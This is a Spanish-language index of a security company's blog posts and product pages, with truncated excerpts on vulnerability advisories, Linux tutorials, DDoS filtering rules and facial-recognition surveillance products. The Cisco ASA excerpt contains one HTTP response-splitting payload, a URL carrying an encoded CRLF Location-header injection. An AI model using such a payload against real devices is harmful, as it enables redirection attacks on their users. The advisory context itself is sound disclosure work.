grupo de hacking ético YGN. El problema está en la inadecuada comprobación de errores. Un atacante remoto podría obtener información sensible. La versión de Joomla! afectada sería la 1.7.1 y anteriores. Este fallo fue reportado el dos de […] - [Ejecución arbitraria de comandos en CiscoWorks Common Services](https://www.republik.ec/ejecucion-arbitraria-de-comandos-en-ciscoworks-common-services/): Cisco ha confirmado la existencia de una vulnerabilidad en CiscoWorks Common Services, en todas las versiones anteriores a la 4.1 para Microsoft Windows, que podría permitir la ejecución de comandos arbitrarios a atacantes remotos. Se ven afectados CiscoWorks LAN Management Solution, Cisco Security Manager, Cisco Unified Operations Manager, Cisco Unified Service Monitor, CiscoWorks Quality de Service Policy Manager y CiscoWorks Voice Manager incluyendo Common Services.  CiscoWorks Common Services es un conjunto de servicios de administración compartidos por las aplicaciones de gestión de redes de Cisco. El problema reside una validación incorrecta de entradas en el componente CiscoWorks Home Page. Un atacante puede enviar una URL específicamente creada a los […] - [Canal de Microsoft en YouTube “HACKEADO”](https://www.republik.ec/canal-de-microsoft-en-youtube-hackeado/): Esta mañana el canal de Microsoft aparentemente ha sido vulnerado por un supuesto atacante, borrando todos los videos que tenia Microsoft  y solicitando suscriptores. El background en el canal ha sido cambiado con una imagen que tiene el mensaje  de “Predator Cinema”,  en parodia de Microsoft Cinema, los mensajes posteados por la cuenta dicen “I DID NOTHING WRONG I SIMPLY SIGNED INTO MY ACCOUNT THAT I MADE IN 2006 :/” Los videos archivados en el canal han sido removidos y remplazados con videos cortos titulados “We are sponsoring!” y “Make us a background to get Subbox!!!”, hasta el momento Microsoft […] - [Múltiples vulnerabilidades en la plataforma educativa Moodle](https://www.republik.ec/multiples-vulnerabilidades-en-la-plataforma-educativa-moodle/): Se han publicado 15 boletines de seguridad que afectan a la plataforma Moodle. Las vulnerabilidades permiten saltar restricciones, ejecutar código arbitrario, revelar información sensible, afectar la integridad de los datos, realizar ataques XSS, CSRF, inyección SQL, y denegación de servicio. Moodle, acrónimo de Modular Object-Oriented Dynamic Learning Environment (en español, Entorno de Aprendizaje Dinámico, Orientado a Objetos y Modular). Es una plataforma educativa de código abierto escrita en PHP,que permite a los educadores crear y gestionar tanto usuarios como cursos de modalidad e-learning. Además proporciona herramientas para la comunicación entre formadores y alumnos.  Se han publicado un total de 15 boletines de seguridad, del MSA-11-0027 al MSA-11-0041, […] - [Envenenamiento DNS via Port Exhaustion(agotamiento de puerto)](https://www.republik.ec/envenenamiento-dns-via-port-exhaustionagotamiento-de-puerto/): Hoy se a liberado un documento muy importante el cual describe un ataque de envenenamiento DNS. Se analizan dos vulnerabilidades 1.- una vulnerabilidad en JAVA (CVE-2011-3552, CVE-2010-4448) el cual permite un envenenamiento DNS remoto usando apples JAVA. Esta vulnerabilidad puede ser activada al abrir una página web maliciosa. Una explotación exitosa de esta vulnerabilidad puede provocar la revelación y la manipulación de las cookie, la divulgación de las credenciales NTLM y datos en el portapapeles del usuario conectado, y evitar incluso firewall. 2.- Una vulnerabilidad en entornos Windows multiusuarios que permite el envenenamiento de caché local DNS de varios dominios. Esta vulnerabilidad puede ser activada por un usuario normal (es decir, sin derechos administrativos) para atacar a otros usuarios del sistema. Una explotación exitosa de esta vulnerabilidad puede provocar la divulgación […] - [Duqu, ¿el nuevo malware descendiente de Stuxnet?](https://www.republik.ec/duqu-el-nuevo-malware-descendiente-de-stuxnet/): Alguien parece que ha tomado el código de Stuxnet y creado un nuevo malware al que se ha llamado Duqu (porque crea ficheros que comienzan con ~DQ). Es un troyano creado como un sistema de control remoto, pero parece estar orientado a infectar sistemas industriales. Diferencias con Stuxnet  Stuxnet contenía dentro de su código la contraseña por defecto “2WSXcder” para la base de datos central del producto SCADA WinCC de Siemens. El troyano conseguía acceso de administración de la base de datos. Duqu parece que simplemente se trata de un sistema de control remoto, pero que se ha encontrado en dependencias industriales europeas. Duqu no se replica. […] - [Fallo crítico detectado en el navegador Opera](https://www.republik.ec/fallo-critico-detectado-en-el-navegador-opera/): Se ha detectado un fallo de seguridad crítico en el navegador Opera que puede ser explotado para inyectar código malicioso. Riesgo: Alto Sistemas afectados: Navegadores Opera v10.x y v11.x anteriores a la v11.52. Descripción: El experto en seguridad José A. Vázquez ha publicado los detalles de un agujero de seguridad en el navegador Opera que puede ser explotado para inyectar código malicioso. El fallo fue reportado a Opera hace más de un año, pero no ha sido hasta ahora, tras la publicación de un exploit para versiones actuales del navegador como complemento para la herramienta Metasploit, cuando el fallo ha […] - [Denegación de servicio en Asterisk](https://www.republik.ec/denegacion-de-servicio-en-asterisk/): Se ha anunciado un problema de seguridad en Asterisk (Versiones 1.8.x anteriores a 1.8.7.1 y 10.x anteriores a 10.0.0-rc1) que podría permitir a un atacante remoto provocar condiciones de denegación de servicio. Asterisk es una aplicación de una central telefónica (PBX) de código abierto. Como cualquier PBX, se pueden conectar un número determinado de teléfonos para hacer llamadas entre sí e incluso conectarlos a un proveedor de VoIP para realizar comunicaciones con el exterior. Asterisk es ampliamente usado e incluye un gran número de interesantes características: buzón de voz, conferencias, IVR, distribución automática de llamadas, etc. Además el software creado por Digium está disponible para plataformas Linux, BSD, MacOS […] - [Malos tiempos para RIM](https://www.republik.ec/malos-tiempos-para-rim/): Tan solo un par de reflexiones en relación con el fallo general sufrido por las Blackberry de medio mundo la semana pasada. Por un lado, y aunque informativamente creo que RIM ha reaccionado mejor que lo hizo SONY en el incidente de seguridad que tuvo hace unos meses —en el que el mutismo fue la actitud adoptada— deshaciéndose en disculpas hacia los usuarios y anunciando compensaciones, en mi modesta opinión, hablar de que “un fallo del conmutador de red” ha dejado fuera de juego durante cuatro días el correo electrónico de empresas y particulares de medio mundo es cuanto menos […] - [Ejecución de código arbitrario a través del comando hardlink](https://www.republik.ec/ejecucion-de-codigo-arbitrario-a-traves-del-comando-hardlink/): A través de Openwall, Alexander Peslyak (más conocido como Solar Designer) ha publicado un fallo en el comando “hardlink” que podría permitir causar una denegación de servicio y, potencialmente, ejecutar código arbitrario a través de nombre de directorios especialmente manipulados. La vulnerabilidad se trata de un desbordamiento de memoria intermedia. Su explotación, de manual básico de la teoría de un desbordamiento, utiliza cadenas especialmente largas. Según se explica en la lista de Openwall, el comando hardlink trabaja con rutas absolutas, lo que facilitaría el poder forzar a la aplicación a trabajar con cadenas extremadamente largas. En el fallo explotado, se han utilizado rutas con gran profundidad de directorios (20 directorios),con […] - [Primer troyano para MAC que detecta la virtualización](https://www.republik.ec/primer-troyano-para-mac-que-detecta-la-virtualizacion/): Desde el blog de F-Secure alertan de la aparición del primer troyano para Mac que detecta si está siendo ejecutado en una máquina virtual, para así alterar su comportamiento y evitar ser analizado. El hecho de que el malware compruebe si se está ejecutando en un entorno de virtualización no es nada nuevo. Es una técnica que viene siendo utilizada desde hace años por gran cantidad de malware. Esto tiene un claro objetivo: los que analizamos malware solemos ejecutarlo en un entorno virtual, que permite aislar los efectos y poder volver rápidamente a un entorno “limpio” restaurando a un estado anterior. Existen infinitas técnicas para comprobar si se […] - [Logical Volume Manager](https://www.republik.ec/logical-volume-manager/): Para empezar definamos que es un LVM según wikipedia significa lo siguiente: LVM es una implementación de un administrador de volúmenes lógicos para el kernel Linux. Se escribió originalmente en 1998 por Heinz Mauelshagen, que se basó en el administrador de volúmenes de Veritas usado en sistemas HP-UX. Ventajas de usar lvm (citando de nuevo a wikipedia) Ventajas de usar LVM en un sistema pequeño Una de las decisiones que afronta un usuario instalando GNU/Linux es cómo particionar el disco duro. La necesidad de estimar cuanto espacio será necesario para el sistema, para los temporales o para los datos personales, puede convertirse en algo problemático, por lo que muchos usuarios optan […] - [Comandos YUM](https://www.republik.ec/comandos-yum/): Que es YUM? Aparte de ser un comando veamos una definición clara que nos da wikipedia: Yellow dog Updater, Modified (YUM) es una herramienta libre de gestión de paquetes para sistemas Linux basados en RPM. Fue desarrollado por Seth Vidal y un grupo de programadores voluntarios, y actualmente se mantiene como parte del proyectoLinux@DUKE de la Universidad de Duke. A pesar de que yum es una utilidad para línea de comandos, otras herramientas proveen a yum de una interfaz gráfica de usuario, como pup, pirut y yumex. Desde que Seth Vidal trabaja en Red Hat, programadores de dicha compañía están implicados en el desarrollo de yum. Yum es una utilidad totalmente reescrita a […] - [Comandos RPM](https://www.republik.ec/comandos-rpm/): Que es RPM? Según la wikipedia RPM es: RPM Package Manager (o RPM, originalmente llamado Red Hat Package Manager, pero se convirtió en acrónimo recursivo ) es unaherramienta de administración de paquetes pensada básicamente para GNU/Linux. Es capaz de instalar, actualizar, desinstalar, verificar y solicitar programas. RPM es el formato de paquete de partida del Linux Standard Base. Originalmente desarrollado por Red Hat para Red Hat Linux, en la actualidad muchas distribuciones GNU/Linux lo usan, dentro de las cuales las más destacadas son Fedora Linux, Mandriva Linux y SuSE Linux. Bueno pues bien ya sabemos que es RPM es un administrador de paquetes de algunos sistemas operativos Linux, ahora veremos sus comandos: Instalacion de paquetes # rpm –ivh […] - [Introduccion al ethical hacking](https://www.republik.ec/introduccion-al-ethical-hacking/): Puede ser un hacker ético? La respuesta es SI, claro que se puede. Para emular la forma de ataque de un intruso informático y no serlo, tiene que haber ética de por medio, más allá de todas las condiciones, términos y activos que haya alrededor del caso. Imaginemos que las autoridades de un banco contratan a alguien para que simule un robo (no a mano armada, claro está) y de ese modo se pruebe la eficiencia de su sistema de seguridad. Este supuesto ladrón profesional, luego de lograr su cometido, informa a sus dueños en detalle cómo pudo hacerlo y […] - [Ayudantes - Comunidad Informatica](https://www.republik.ec/ayudantes-comunidad-informatica/): Se invita a todos los informaticos que tengan conocimiento medio-avanzado, que deseen compartir su experiencia y conocimientos en Sistemas operativos(de cualquier tipo), redes, programación, seguridad informática, bases de datos, hacking, electrónica, etc. La participación es sin fines de lucro demostrando su conocimiento y ayudando a mantener el blog, contribuyendo a la formación de una pequeña comunidad informática. - [El router Xtreme N Storage de D-Link, no cifra la red inalámbrica WPA o WPA2](https://www.republik.ec/el-router-xtreme-n-storage-de-d-link-no-cifra-la-red-inalambrica-wpa-o-wpa2/): Jerry Decime ha reportado un error en el router DIR-685 Xtreme N Storage de D-Link que haría que una red inalámbrica cifrada pasase a transmitir todo su tráfico sin ningún tipo de protección. Al parecer, una de las condiciones en las que se ha conseguido reproducir el fallo se da cuando el router está configurado para ofrecer una red inalámbrica con cifrado WPA o WPA2 y clave AES precompartida (PSK). La segunda condición que da lugar al fallo es la de transmitir una gran cantidad de datos sobre la red. Bajo esta carga, el router pasaría de cifrar todo el tráfico generado, a enviar todos los datos […] - [Múltiples vulnerabilidades en productos Cisco](https://www.republik.ec/multiples-vulnerabilidades-en-productos-cisco/): Cisco ha anunciado una serie de vulnerabilidades que afectan al módulo Firewall Services Module (FWSM) de los switches Catalyst serie 6500 y los routers de la serie 7600 en las versiones 3.1.x, 3.2.x, 4.0.x, y 4.1.x. Las vulnerabilidades pueden tener un impacto de denegación de servicio o salto de restricciones. Más detalles a continuación: * Denegación de servicio a través de un error en los mensajes ‘syslog’. El error se encuentra en la implementación de un mensaje de log cuyo identificador es 302015. Cuando se genera este mensaje a causa del tráfico IPv6, puede ocurrir un fallo de memoria que conlleve una denegación de servicio. A esta […] - [Nmap desde 0](https://www.republik.ec/nmap-desde-0/): Este tema va dedicado para un amigo Jefferson Encarnacion “El Flaco” sus ganas por manejar bien Nmap me hizo hacer este tutorial de este mapeador de redes excelente, muy usado en las auditorias de seguridad informática, Ha llegado a ser uno de las herramientas imprescindibles para todo administrador de sistema, y es usado para pruebas de penetración y tareas de seguridad informática en general. Como muchas herramientas usadas en el campo de la seguridad informática, es también una herramienta muy utilizada para hacking, pero que es nmap?. A continuación explicaremos lo siguiente. Que es Nmap? Según Wikipedia, Nmap es un programa de código abierto que sirve […] - [Instalacion de Asterisk desde 0](https://www.republik.ec/instalacion-de-asterisk-desde-0/):  Hace un tiempo atrás empece a manejar asterisk gracias a un trabajo que tuve como administrador en un call center y de verdad quede fascinado debido a la facilidad que me daba asterisk(no todos concuerdan conmigo), asi que he decidido crear un pequeño y básico tutorial para instalar asterisk sobre debían para aquellas personas que no tienen nocion de cómo empezar antes que nada dejemos claro unas preguntas. Que es asterisk? Según Digium los creadores de Asterisk la definición es: “Es un Software que convierte una computadora ordinaria en un Servidor de Comunicaciones. Asterisk es el motor de Conmutadores IP, Pasarelas de […] - [No siempre nuestro mejor vecino es el que nos deja el WIFI abierto](https://www.republik.ec/no-siempre-nuestro-mejor-vecino-es-el-que-nos-deja-el-wifi-abierto/): Hace un tiempo atrás detecte una red wifi sin clave lo primero que hice fue hurgarla y ver que el router  tenia como user: admin y pass:hacker123,  algo extremadamente extraño ya que ningún “buen vecino” le pone esa clave a su router,  seguí viendo la red y vi que me mostraba conexión al internet hice las pruebas necesarias de ping y demás y todo salió bien, soy de los que piensa que el oro no se encuentra en la calle, así que decidí desconectarme por motivos de seguridad. Al pasar de los días amigos míos comentaban sobre la red abierta […] - [Configurando un firewall anti DDoS en Linux](https://www.republik.ec/configurando-un-firewall-anti-ddos-en-linux/): Bueno lo prometido es deuda hace unos dias prometi explicar en cierta forma como evitar un DDoS, pues bien hay formas sencillas como hay formas mas complicadas aqui pongo el ejemplo: iptables -A INPUT -p tcp -d IP -m length –length 40:48 -j DROP //este comando nos ayuda para botar los paquetes de cierta longitud iptables -A INPUT -p tcp -s 0.0.0.0/0 -d IP -m ttl –ttl 111 -j DROP //este comando bloqueara automaticamente todos los paquetes entrantes con cierto valor TTL (otra forma comun de ataque DDOS) Estos comandos son algo digamos sencillos como para detener un DDoS algo […] - [DDoS el asesino silencioso](https://www.republik.ec/ddos-el-asesino-silencioso/): Muchos diran “que titulo” no creo que un ddos sea un asesino silencioso, pues bien mirandolo desde el punto economico, un DDoS no solo es un asesino silencioso, es un asesino en potencia, los ataques DDoS han dejado muchas perdidas economicas en grandes empresas lo cual se dedican a negocios por internet, o simplemente se ven imposibilitados de enviar un correo o tan solo brindar un buen servicio a sus usuarios. Pero que es un DDoS? Pues bien, segun wikipedia un DDoS es una ampliación del ataque Dos es el llamado ataque distribuido de denegación de servicio, también llamado ataque […] - [Eh regresado!!!](https://www.republik.ec/eh-regresado/): Saludos una vez mas!!!! hace mucho tiempo deje de postear debido a varios factores(falta de tiempo, problemas personales, trabajo) en fin, eh regresado y para quedarme, hay muchas tecnicas nuevas que enseñar, hay muchos temas que hablar que muchos egoistas no quieren hablar!!! pues bien esta semana preparare un curso mas detallado de linux lo prometi a una amiga y aun no se lo doy :S Tambien hablare como proteger tu propia red, que mejor que aprendiendo primero atacarla vulnerarla y explotarla, bien es dicho un buen detectiva debe pensar como ladron como asesino sino estara perdido!!! No los canso […] - [Firefox introduce una grave vulnerabilidad con sus últimos parches](https://www.republik.ec/firefox-introduce-una-grave-vulnerabilidad-con-sus-ultimos-parches/): El día 20 de julio Mozilla anunciaba la nueva versión 3.6.7 y 3.5.11 de su navegador, que corregía 15 vulnerabilidades en 14 boletines de seguridad diferentes. Tres días más tarde ya está disponible la versión 3.6.8 para solucionar una vulnerabilidad introducida al corregir las anteriores. La versión 3.6.8 de Firefox se ha tenido que lanzar con cierta urgencia (solo tres días después de publicar la versión 3.6.7) para corregir una vulnerabilidad que permite la ejecución de código arbitrario. La solución introducida en la versión 3.6.7 para corregir un problema de manejo de plugins, introducía un fallo que, bajo ciertas circunstancias, […] - [Vulnerabilidad en dispositivos Cisco Industrial Ethernet 3000 Series Switch](https://www.republik.ec/vulnerabilidad-en-dispositivos-cisco-industrial-ethernet-3000-series-switch/): Cisco ha anunciado una vulnerabilidad en dispositivos Cisco Industrial Ethernet 3000 Series Switch (con versiones de IOS 12.2(52)SE o 12.2(52)SE1), que podría permitir a usuarios remotos el acceso a los dispositivos. El problema reside en que el dispositivo hace uso de nombres de comunidad SNMP (“public” y “private”) conocidos codificados internamente tanto para lectura como para escritura. Si se borran los nombres de comunidad SNMP, estos volverán a aplicarse cuando se reinicie el dispositivo. Este problema podría permitir a un atacante remoto conseguir acceder al dispositivo y conseguir control total sobre su configuración. Cisco ha desarrollado una actualización (12.2(55)SE), que […] - [Desbordamiento de búfer en VLC Media Player](https://www.republik.ec/desbordamiento-de-bufer-en-vlc-media-player/): Se ha descubierto una vulnerabilidad en el reproductor de archivos multimedia VLC 1.0.5 que podría ser aprovechada por un atacante remoto para ejecutar código arbitrario. VLC Media Player es un completo reproductor multimedia que soporta un gran número de formatos, como pueden ser: MP3, MPEG, DIVX, VCD o DVD entre otros, así como varios protocolos de streaming. Además está disponible para un amplio número de plataformas distintas como Windows, Mac OS X y para varias distribuciones de Linux. VLC también puede ser utilizado como servidor en unicast o multicast, en IPv4 o IPv6, para una red de banda ancha y […] - [Vulnerabilidades en Cisco Content Services Switch](https://www.republik.ec/vulnerabilidades-en-cisco-content-services-switch/): Se ha anunciado la existencia de dos vulnerabilidades en los dispositivos Cisco Content Services Switches 11500, que pueden ser explotadas por un usuario malicioso para provocar una denegación de servicio o evitar restricciones de seguridad. La vulnerabilidad de denegación de servicio (explotable remotamente) reside en el tratamiento de cabeceras HTTP con saltos de línea especialmente manipulados. Otro problema permitiría saltar restricciones de seguridad mediante el uso de cabeceras HTTP especialmente manipuladas con el parámetro “ClientCert”. Hasta el momento no se ha publicado ninguna actualización para corregir estos problemas. Para mitigar el riesgo de las cabeceras con “ClientCert” se recomienda el […] - [El divorcio entre el malware y la pornografía](https://www.republik.ec/el-divorcio-entre-el-malware-y-la-pornografia/): A principios de esta década, se solía acusar a los usuarios que quedaban infectados por algún tipo de malware de navegar por páginas “de dudosa reputación”. Esto incluía páginas pornográficas, cracks, warez, etc. Pero los tiempos han cambiado, y esta relación malware-pornografía ha pasado a ser un mito más que revisar. El peligro hoy, de hecho, está en cualquier página. Dialers, codecs, vídeos camuflados como ejecutables… todo tipo de trucos eran válidos a principios de esta década para que los usuarios que buscaban sexo en la red quedaran infectados. Hoy se siguen usando, pero los métodos de infección preferidos por […] - [Denegación de servicio en MySQL](https://www.republik.ec/denegacion-de-servicio-en-mysql/): Se ha descubierto una vulnerabilidad en MySQL que podría ser utilizada por un atacante para provocar una denegación de servicio. MySQL es un sistema de gestión de base de datos relacional, multihilo y multiusuario que se desarrolla como software libre y cuenta con millones de implantaciones en todo el mundo. El problema reside en el tratamiento de determinados comandos “ALTER DATABASE”. Un atacante con permisos “ALTER” podría alterar el nombre del directorio usando caracteres especiales y provocar que el directorio de sistema se usase como directorio de la base de datos. Esto volvería todo el sistema inusable. Se ven afectadas […] - [Salto de restricciones a través de HTTP en Cisco ASA](https://www.republik.ec/salto-de-restricciones-a-traves-de-http-en-cisco-asa/): Cisco ha confirmado la existencia de una vulnerabilidad en dispositivos Cisco ASA, que podría permitir a un atacante remoto ejecutar scripts arbitrarios mediante peticiones http: El problema reside al procesar los parámetros de entrada del usuario en Cisco ASA. Un atacante remoto podría aprovechar este error para ejecutar scripts arbitrarios a través de una redirección provocada por una inyección del tipo http://x.x.x.x/%0d%0aLocation%3a%20http%3a%2f%2fwww%2eurl%2ecom ‘ Cisco ha publicado la versión 8.1(2) del software destinada a corregir este problema, disponible desde: http://www.cisco.com/cisco/web/download/index.html Más información: Cisco ASA 5580 Series Release Notes Version 8.1(2)http://www.cisco.com/en/US/docs/security/asa/asa81/release/notes/asarn812.html Cisco ASA HTTP Response Splitting Vulnerability http://www.secureworks.com/ctu/advisories/SWRX-2010-001 - [negación de servicio a través de archivos PDF y ejecutables en ClamAV 0.x](https://www.republik.ec/negacion-de-servicio-a-traves-de-archivos-pdf-y-ejecutables-en-clamav-0-x/): ClamAV ha publicado una actualización que corrige dos vulnerabilidades en su motor antivirus ClamAV 0.x que permiten a un atacante hacer que motor deje de responder si se envían ciertos ficheros especialmente manipulados.  ClamAV es un motor antivirus de código abierto muy popular en el mundo del software libre, empleado con frecuencia en servidores de correo derivados de UNIX a modo de defensa perimetral primaria. En el verano de 2007 el proyecto fue comprado por la compañía Sourcefire, aunque el programa no ha sufrido sustanciales cambios desde entonces. De forma resumida las vulnerabilidades son las siguientes: * Un fallo en la función cli_pdf de la librería libclamav/pdf.c podría permitir a […] - [Acceso a información sensible en IBM WebSphere Application Server](https://www.republik.ec/acceso-a-informacion-sensible-en-ibm-websphere-application-server/): Se ha anunciado una vulnerabilidad en IBM WebSphere Application Server (versiones 6.x y 7.0), que podría permitir a un atacante la obtención de información sensible. IBM WebSphere Application Server (WAS) es el servidor de aplicaciones de software de la familia WebSphere de IBM. WAS puede funcionar con diferentes servidores web y sistemas operativos incluyendo Apache HTTP Server, Netscape Enterprise Server, Microsoft Internet Information Services (IIS), IBM HTTP Server en sistemas operativos AIX, Linux, Microsoft, Windows y Solaris. El problema reside en el Web Container cuando maneja nombres de más de 20 caracteres. Un atacante podría aprovechar esto para provocar que el servidor devuelva un archivo erróneo y conseguir acceder a archivos arbitrarios. Para […] - [SEGURIDADES Diversas vulnerabilidades en 3Com Intelligent Management Center (IMC)](https://www.republik.ec/seguridades-diversas-vulnerabilidades-en-3com-intelligent-management-center-imc/): Se han anunciado cuatro vulnerabilidades en 3Com Intelligent Management Center (IMC) versiones anteriores a la 3.3 SP2 (R2606P13), que podrían permitir a unatacante conseguir información sensible o evitar restricciones de seguridad.  El primero de los problemas se debe a errores de validación de entrada en el script “imc/report/DownloadReportSource” al procesar los parámetros “fileDir” y “fileName”. Un atacante podría emplear esto para descargar cualquier archivo mediante ataques de escalada de directorios.  La segunda vulnerabilidad se debe a errores al procesar los parámetros “javax.faces.ViewState” y “callCount”, o URLs introducidas por el usuario. Un atacante podría aprovechar este problema para construir ataques de cross-site scripting.  Un tercer fallo reside en la validación […] - [MAC OSX siempre da mucho de que hablar Actualizaciones de seguridad de Java para Apple Mac OS X](https://www.republik.ec/mac-osx-siempre-da-mucho-de-que-hablar-actualizaciones-de-seguridad-de-java-para-apple-mac-os-x/): Apple ha lanzado nuevas actualizaciones de seguridad de Java para su sistema operativo Mac OS X versiones 10.5 y 10.6 que solventan un gran número de vulnerabilidades que podrían ser aprovechadas con diversos efectos.  Esta es la séptima actualización de Java para Mac OS X 10.5 (Java para Mac OS X 10.5 Update 7) y la segunda para MAC OS X 10.6 (Java para Mac OS X 10.6 Update 2). Se han corregido un gran número de problemas en Java, que podrían llegar a permitir a un atacante evitar restricciones de seguridad, obtener información sensible, provocar denegaciones de servicio o comprometer los sistemas afectados.  Las actualizaciones pueden ser […] - [PANTALLAZO AZUL Vulnerabilidad a través de Aero en Windows 7 y 2008 R2 (versiones de 64 bits)](https://www.republik.ec/pantallazo-azul-vulnerabilidad-a-traves-de-aero-en-windows-7-y-2008-r2-versiones-de-64-bits/): Microsoft ha advertido sobre una vulnerabilidad que en realidad se hizo pública hace meses, y que afecta a Windows 7 y 2008 R2 en sus versiones de 64 bits. El fallo se puede aprovechar solo si el componente Aero está activo. La vulnerabilidad se ha descubierto a través del popular visor gratuito de imágenes Irfanview.  El fallo se encuentra en el renderizado de imágenes con la API GDI, en concreto en el componente Canonical Display Driver (cdd.dll). CDD emula una interfaz de Windows XP para que las aplicaciones accedan al motor de gráficos GDI. El fallo podría ser aprovechado por un atacante para causar una denegación de servicio […] - [Vulnerabilidades de ejecución de código en PostgreSQL](https://www.republik.ec/vulnerabilidades-de-ejecucion-de-codigo-en-postgresql/): Se han anunciado diversos problemas en PostgreSQL (versiones 8.x y 7.4), que podrían permitir a un atacante evitar restricciones de seguridad o ejecutar código arbitrario.  PostgreSQL es una base de datos relacional “Open Source”, bastante popular en el mundo UNIX, junto a MySQL.  El primer problema se debe a errores en “Safe.pm” y “PL/Perl”; un atacante autenticado podría emplearlos para ejecutar código Perl en el servidor de base de datos si PL/Perl está instalado y activo.  La segunda vulnerabilidad reside en la asignación incorrecta de permisos en la tabla “pltcl_modules”, un usuario autenticado podría emplear este fallo para ejecutar código Tcl en el servidor si PL/Tcl está […] ## Pages - [Kuaker](https://www.republik.ec/kuaker/): [vc_row][vc_column][vc_column_text css=””] Paso 1: Medir la Pantalla Táctil Infrarroja (IR Touch) Una vez que tengas tu pantalla táctil infrarroja (IR Touch), mídela y construye tu marco utilizando esas medidas. Tu pantalla IR Touch encajará perfectamente en el marco. Después de medir tu pantalla táctil, toma una pieza de tu marco y colócala junto a la pantalla IR Touch. Esa será la medida que necesitarás para cortar tu marco. Corta el marco a la medida adecuada, usando sargentos de mesa para mantener la forma mientras se seca el pegamento. [/vc_column_text][/vc_column][/vc_row][vc_row][vc_column width=”1/3″][/vc_column][vc_column width=”1/3″][/vc_column][vc_column width=”1/3″][/vc_column][/vc_row][vc_row][vc_column][vc_empty_space][/vc_column][/vc_row][vc_row][vc_column][vc_column_text css=””] Paso 2: Prepara tu cristal Ahora necesitarás […] - [PublikSurveillance](https://www.republik.ec/publiksurveillance/): [vc_row][vc_column][service-single-section-start-shortcode hero=”70″ hero1=”1202″][vc_column_text css=”.vc_custom_1639685774006{margin-bottom: 15px !important;}”] Reconocimiento facial de alto rendimiento para entornos multitudinarios [/vc_column_text][vc_column_text css=”.vc_custom_1639687648012{margin-bottom: 25px !important;}”] La solución de videovigilancia de Republik, PublikSurveillance, detecta múltiples caras a tiempo real, facilita la gestión de usuarios en cualquier momento y permite entrenar mediante captura de vídeo (on-the-fly). [/vc_column_text][vc_column_text] PublikSurveillance utiliza cámaras de videovigilancia para reconocer las caras de las personas incluidas en la listas negras. PublikSurveillance ofrece un rendimiento excelente con oclusiones parciales de la cara, gafas, bufandas, gorras, cambios de expresión facial, sombras, altos contrastes y condiciones de iluminación extremas o deficientes, y rotaciones moderadas de la cara. PublikSurveillance trabaja […] - [PublikMarketing](https://www.republik.ec/publikmarketing/): [vc_row][vc_column][service-single-section-start-shortcode hero=”70″ hero1=”1199″][vc_column_text css=”.vc_custom_1639684360173{margin-bottom: 15px !important;}”] Soluciones de análisis facial para marketing dirigido [/vc_column_text][vc_column_text css=”.vc_custom_1639685360967{margin-bottom: 25px !important;}”] El análisis facial es útil como medio de detección e identificación de un individuo, pero también es una excelente herramienta para aprender más sobre sus clientes. Mediante Deep Learning, los algoritmos de PublikMarketing son capaces de extraer y codificar automáticamente la información más relevante del rostro, lo que permite recopilar diferentes estadísticas de clientes. [/vc_column_text][vc_column_text css=”.vc_custom_1639685402445{margin-bottom: 25px !important;}”] PublikMarketing le permite perfilar a los visitantes en función de su rostro. Esta comprensión más profunda de sus prospectos es clave para el éxito y ayuda […] - [PublikFinder](https://www.republik.ec/publikfinder/): [vc_row][vc_column][service-single-section-start-shortcode hero=”70″ hero1=”1190″][vc_column_text css=”.vc_custom_1639682541107{margin-bottom: 15px !important;}”] Reconocimiento Facial para el análisis forense de vídeo e imágenes a máxima velocidad [/vc_column_text][vc_column_text css=”.vc_custom_1639683911201{margin-bottom: 25px !important;}”] PublikFinder es la solución de Republik que permite la búsqueda mediante reconocimiento facial de un determinado sujeto en uno o varios vídeos grabados. Al trabajar con arquitectura GPU, se logra procesar a gran velocidad todas las imágenes del vídeo objeto de análisis. PublikFinder permite realizar análisis a velocidades superiores al tiempo real. De esta forma, es posible localizar a un determinado sujeto más rápido que si visualizásemos el vídeo a su velocidad original. PublikFinder es un producto cuyas aplicaciones […] - [PublikAccess](https://www.republik.ec/publikaccess/): [vc_row][vc_column][service-single-section-start-shortcode hero=”70″ hero1=”1162″][vc_column_text css=”.vc_custom_1639670799778{margin-bottom: 15px !important;}”] Soluciones de control de acceso a través de Reconocimiento Facial [/vc_column_text][vc_column_text css=”.vc_custom_1639670942987{margin-bottom: 25px !important;}”] PublikAccess es la solución de Republik para la gestión sencilla y fiable de sistemas de control de acceso mediante tecnología de reconocimiento facial.PublikAccess funciona correctamente incluso con ocultación parcial del rostro, rotaciones moderadas de la cara, uso de gafas, gorras, mascarillas y cambios en la expresión facial. [/vc_column_text][vc_column_text css=”.vc_custom_1639670977828{margin-bottom: 25px !important;}”] Además, evita la suplantación de identidad mediante fotografías y detecta el uso de mascarilla. La tecnología biométrica de reconocimiento facial mejora la seguridad y el control en el acceso de […] - [Seguridad informática](https://www.republik.ec/seguridad-informatica/): [vc_row][vc_column][service3-section-start-shortcode][service3-section-tab-start-shortcode class=”active” id=”tab1″ title=”Hacking ético”][service3-section-tab-start-shortcode id=”tab2″ title=”Análisis forense”][service3-section-tab-start-shortcode id=”tab3″ title=”Asesoramiento en ciberseguridad”][service3-section-tab-start-shortcode id=”tab4″ title=”Auditoría de aplicaciones móviles”][service3-section-tab-end-shortcode][service3-section-tab-shortcode heroimage=”1119″ class=”active show” id=”tab1″ title=”Red Team (Test de intrusión)” des=”La misión del Red Team de Republik es simular un agente externo esponsorizado que realice un acceso no autorizado a los sistemas corporativos contemplando, además de la intrusión clásica, la persistencia a lo largo del tiempo, el escalado de privilegios en sistemas corporativos e incluso la alteración y robo de información estratégica para el negocio. Para entender los beneficios que proporciona un Red Team se deben contrastar sus diferencias con los tests de intrusión […] - [Seguridad electrónica](https://www.republik.ec/seguridad-electronica/): [vc_row][vc_column][service3-section-start-shortcode][service3-section-tab-start-shortcode class=”active” id=”tab1″ title=”Cercos eléctricos”][service3-section-tab-start-shortcode id=”tab2″ title=”Control de acceso”][service3-section-tab-start-shortcode id=”tab3″ title=”Camaras de seguridad”][service3-section-tab-start-shortcode id=”tab4″ title=”Control de acceso vehicular”][service3-section-tab-end-shortcode][service3-section-tab-shortcode heroimage=”1083″ class=”active show” id=”tab1″ title=”Instalación de cercos eléctricos” des=”Son un sistema de seguridad, en el que un alimentador o electrificador genera impulsos cortos de alta tensión a intervalos de un segundo para proteger perímetros emitiendo pequeñas descargas. Las cercas eléctricas son consideradas uno de los sistemas más eficientes para cuidar todo el perímetro de empresas u hogares. Esto se debe a que, la persona que desea entrar sin autorización se mantiene fuera de los perímetros de la propiedad y aunque lo intente, […] - [Sample Page](https://www.republik.ec/sample-page/): This is an example page. It’s different from a blog post because it will stay in one 